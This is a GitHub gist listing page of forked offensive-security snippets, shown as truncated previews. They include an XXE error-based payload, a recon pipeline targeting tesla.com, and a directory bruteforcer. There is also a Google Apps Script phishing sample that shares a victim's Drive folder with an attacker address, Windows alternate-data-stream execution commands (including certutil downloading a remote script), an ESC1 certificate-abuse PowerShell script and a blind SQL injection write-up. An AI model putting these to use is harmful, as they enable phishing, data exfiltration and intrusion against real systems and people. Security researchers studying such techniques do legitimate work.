Skip to content

Instantly share code, notes, and snippets.

View srand2's full-sized avatar
🕸️
Working from home

srand2

🕸️
Working from home
View GitHub Profile
@srand2
srand2 / guid_reaper.py
Created January 31, 2024 18:15 — forked from DanaEpp/guid_reaper.py
Tool to dump v1 GUIDs and generate a wordlist of GUIDs for use in bruteforce attacks against APIs with predictable GUIDs
#!/bin/env python3
import argparse
import datetime
import re
import sys
import uuid
###############################################################################
# Based off of Daniel Thatcher's guid tool
#pip install ecdsa
#
import base64
import hashlib
from hashlib import sha256
import hmac
from ecdsa.ecdsa import Signature, generator_256
from ecdsa import VerifyingKey, NIST256p
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "http://example.com:9200/_cat/indices">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
curl https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json |jq -r '.vulnerabilities[].cveID' > cves.txt
subfinder -d tesla.com -silent |dnsx -silent -a -resp-only |sort -u |xargs -n1 -P 1500 -I% curl -s http://networktools.nl/whois/$url% |grep "CIDR" |cut -d : -f2 |tr , "\n"| awk '{$1=$1};1' |sort -u |egrep -v "/8|/9|/10|/11|/12|/13|/14|/15|/16" |while read ip ;do whois -h whois.cymru.com " -v $ip" ;done |grep -v "BGP Prefix" |cut -d '|' -f3 |awk '{$1=$1};1' |sort -u |cidr2ip |sort -u |nrich - |grep -B4 -f cves.txt | tee shodan.txt; slackcat --channel bugbounty --filename shodan.txt
@srand2
srand2 / aodirb.py
Created July 5, 2023 18:11 — forked from nullenc0de/aodirb.py
pip3 install asyncio and pip3 install import aiohttp
import asyncio
import aiohttp
import time
import sys
import argparse
import os
parser = argparse.ArgumentParser(description='Directory Bruteforce')
parser.add_argument('-u', '--url', help='URL to bruteforce', required=True)
parser.add_argument('-w', '--wordlist', help='Wordlist to use', required=True)
@srand2
srand2 / driveSearch.gs
Created May 29, 2023 11:38 — forked from ahhh/driveSearch.gs
Google App Script Phishing #2
function driveSearch() {
// Setup the exfil folder
var user = Session.getActiveUser().getEmail();
var folder = DriveApp.createFolder(user);
var attackerEmail = "[email protected]";
folder.addViewer(attackerEmail);
// Search Drive
var files = DriveApp.searchFiles('hidden = false');
// Iterate through files in Drive
@srand2
srand2 / Exe_ADS_Methods.md
Created May 18, 2023 17:27 — forked from api0cradle/Exe_ADS_Methods.md
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@srand2
srand2 / esc1.ps1
Created May 17, 2023 18:01 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER
@srand2
srand2 / boolean-based-blind-sql-injection.md
Created March 21, 2023 19:35 — forked from simonemainardi/boolean-based-blind-sql-injection.md
Using Blind SQL Injections to Retrieve Access Credentials of a Website

Using Blind SQL Injections to Retrieve Access Credentials of a Website

In this gist I show how I leveraged a boolean-blind sql injection to gain access to a protected website. The injection allowed me query the website database and retrieve a valid pair username/password. Using the retrieved credentials I was able to login into the protected section of the website.

Software Used

To perform the attack I used:

  • sqlmap to discover the website was vulnerable to SQL injections.
  • Burp Suite to forge and send POST requests to the website login page, carrying payloads opportunely crafted with SQL queries.